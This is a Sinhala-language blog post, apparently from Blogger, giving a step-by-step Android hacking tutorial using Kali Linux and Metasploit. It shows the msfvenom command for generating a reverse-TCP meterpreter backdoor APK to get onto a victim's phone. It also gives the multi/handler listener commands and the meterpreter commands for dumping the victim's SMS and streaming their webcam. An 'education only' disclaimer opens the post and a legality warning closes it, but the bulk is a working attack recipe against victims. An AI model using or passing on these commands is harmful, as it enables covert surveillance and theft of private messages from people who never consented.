kali linux android Hacking (metasploit framework)



                                             ~අධ්‍යාපන දැනුම සදහා පමණි ~

සුබ දවසක්  මේ kali linux වල දෙවෙනි post එක පළවෙනියටම කියන්න ඕනේ මේ post එක අධ්‍යාපන දැනුම සදහා පමණයි

හරි අපිට ඕනෙම android device එකක පාලනය පහසුවෙන් ම ලබා ගන්න පුළුවන් ක්‍රමයක් ගැන තමයි අද post එකෙන් කියන්න බලාපොරොත්තු වෙන්නේ

මේකට පාවිච්චි කරන්නේ  metasploit framework එක.  මේකෙදි සිද්ද වෙන දේ ගැන කිව්වොතින්  මේක 100% කම remotly සිද්ද කරන්න බෑ  , මේකෙදි අපි metasploit වලින් backdoor එකක් සාදා ගැනීමත්  , ඒ backdoor
apk එක අපේ victime ගේ අතට පත් කරන්නත් ඕනේ , ඊට පස්සේ  metasploitවලින් victime ගේ device එකේ පාලනය අපේ අතට ගන්න පුළුවන්

අපිට victime ගේ messages කියවන්න camera stream කරන්න වගේ වැඩ කරගන්න පුළුවන්

හරි එහෙනම් බලමු කොහොමද කරන්නේ කියලා

මුලින්ම terminal එක open කරගන්න

දැන් මේ code එක පාවිච්චි කරලා අපි android backdoor rat package එක genarate කරගමු

 msfvenom -p android/meterpreter/reverse_tcp –platform android LHOST= “ඔබේ ip ලිපිනය ” LPORT=444() -o /root/Desktop/backdoor.apk(කැමති path එකක් use කරන්න )

කලින් මේකට පාවිච්චි කලේ  msfpayload කියන main command එක එත් දැන් ඒ වෙනුවට  මේ command එක තමයි බාවිතා වෙන්නේ

හරි දැන් අපි අපේ backdoor එක genarate කරගෙන ඉවරයි දැන් අපි හිතමු අපේ victime මේක install කළා කියල

දැන් බලමු කොහොමද එයාගේ device එකට access වෙන්නේ කියල
මුලින්  metasploit console එක open කරගන්න
දැන් මේ code use කරන්න



use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LPORT 444 (අපි backdoor එක genarate කරගන්න විට එකට යොදපු පොර්ට් එක )
set LHOST “ඔබේ ip ලිපිනය ”
exploit

හරි දැන් අපේ victime අන්තර්ජාලයට සම්බන්ද වෙලා ඉන්නවනම් අපේ backdoor එක අපේ ip ලිපිනයට හා පොර්ට් එකට සම්බන්ද වෙනවා දැන් අපි හිතමු සැසිය (session)
එක හැදුන කියලා
දැන් අපි එයාගේ device එකේ පාලනය අතට අරන් ඉවරයි

දැන් මේ වගේ code use කරන්න පුළුවන්
එයා ගේ  messages read කරන්නනම්
dump_sms

වෙබ් cam stream කරන්න
webcam_stream

මෙතැනදී අපිට  victime ගේ sms text file එකක් විදිහට ලබාගන්න පුළුවන්
මේකෙන් තව ගොඩක් දේවල් කරගන්න පුළුවන් මේ තමා මුලික දේවල් ටික

හරි එහෙනම් ආයෙමත් කියනවා මේ ගැන දැනුමක් ලබා ගන්න පළකරපු post එකක් නිසා කාටවත් හිරිහැර වෙන විදිහට මේ දැනුම යොදාගන්න එපා මොකද සෑම රටකම මේ වගේ දේවල් කරන එක නීති විරෝදියි


kali linux android Hacking (metasploit framework) kali linux android Hacking (metasploit framework) Reviewed by vihan on 8:05:00 AM Rating: 5

No comments:

Comments

Powered by Blogger.